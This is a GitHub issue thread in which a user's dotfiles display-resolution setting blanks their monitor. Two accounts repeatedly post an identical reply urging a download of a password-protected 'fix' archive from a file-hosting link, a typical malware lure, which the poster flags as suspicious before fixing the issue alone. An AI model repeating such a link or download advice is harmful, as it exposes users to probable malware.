### ISSUE TITLE
[BUG] Display Resolution 😭

### ISSUE THREAD

**Issue by mtp-carolinas** [mylinuxforwork/dotfiles#189]
Steps I took to reach this error:
1) Open dotfiles settings
2) System 
3) Display Resolution (I started changing the resolution because I couldn't see the bar at the top of the screen, so maybe the resolution was too high or something 😭 
4) started choosing resolutions to find the right one and then one option...idk removed the screen 😭. And there isn't a confirm or else a countdown will revert settings so now it's stuck, I clicked super + return to open the terminal then types reboot, but every time I log back in it still trying to use a monitor that doesn't exist, now my tv(monitor) just says, Is "Computer" On? The message I get when hdmi isn't plugged in... I have endeavor os - gnome so is there a way I could log in to that and change the resolution in terminal from there? Gnome uses the resolution 19:6 ratio which works fine. I think that's 1920x1080 🤔

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mtp-carolinas** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

Considering this showed up as soon as I posted and a download won't fix this issue, I herby mark this comment as sus and rebuke it in the name of Jesus Christ! 🙏

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mtp-carolinas** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

Considering this showed up as soon as I posted and a download won't fix this issue, I herby mark this comment as sus and rebuke it in the name of Jesus Christ! 🙏

**Comment by mtp-carolinas** [comment]
@mylinuxforwork Please help 😇

**Comment by mtp-carolinas** [comment]
Nevermind fixed it 😭 I just reopened the app in the gnome session and changed it 💀💀💀
